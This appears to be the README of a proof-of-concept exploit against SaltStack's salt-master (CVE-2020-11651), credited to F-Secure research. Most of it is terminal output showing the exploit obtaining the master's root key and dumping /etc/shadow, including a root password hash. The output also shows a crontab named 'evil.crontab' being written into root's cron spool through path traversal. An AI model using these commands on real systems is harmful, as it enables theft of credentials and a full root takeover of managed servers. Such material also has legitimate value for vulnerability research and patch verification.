This is a proof of concept exploit based on the initial check script.
Thanks for F-Secure Labs for their research and reporting.
Currently this script handles reading and writing arbitrary files, but that ought to suffice for demonstrating the vulnerabilities:
root@kalimah:~/salt# python2 exploit.py --read /etc/shadow
[+] Salt version: 2019.2.0
[ ] This version of salt is vulnerable! Check results below
[+] Checking salt-master (127.0.0.1:4506) status... ONLINE
[+] Checking if vulnerable to CVE-2020-11651...
[*] root key obtained: mrPiAdL9nwrx+ql7hDnxPVx0ejRtYAe+tX5VAy3O40eylZlK7476/skESYBbJvydSgikP5I7Os8=
[+] Attemping to read /etc/shadow from 127.0.0.1
root:$6$7qfolaa/$3yhszWj/VUJjfPaqr1yO6NLgV/FhHnVT9Pr6spwJ/F0BJw5vFM.3KjtwcnnuGo5uSJJkLrd28jXrmVZUD9nEI/:17812:0:99999:7:::
daemon:*:17785:0:99999:7:::
bin:*:17785:0:99999:7:::
sys:*:17785:0:99999:7:::
sync:*:17785:0:99999:7:::
games:*:17785:0:99999:7:::
man:*:17785:0:99999:7::
[...]
root@kalimah:~/salt# python2 exploit.py --upload-src evil.crontab --upload-dest ../../../../../..//var/spool/cron/crontabs/root
[+] Salt version: 2019.2.0
[ ] This version of salt is vulnerable! Check results below
[+] Checking salt-master (127.0.0.1:4506) status... ONLINE
[+] Checking if vulnerable to CVE-2020-11651...
[*] root key obtained: mrPiAdL9nwrx+ql7hDnxPVx0ejRtYAe+tX5VAy3O40eylZlK7476/skESYBbJvydSgikP5I7Os8=
[+] Attemping to upload evil.crontab to ../../../../../..//var/spool/cron/crontabs/root on 127.0.0.1
Wrote data to file /srv/salt/../../../../../..//var/spool/cron/crontabs/root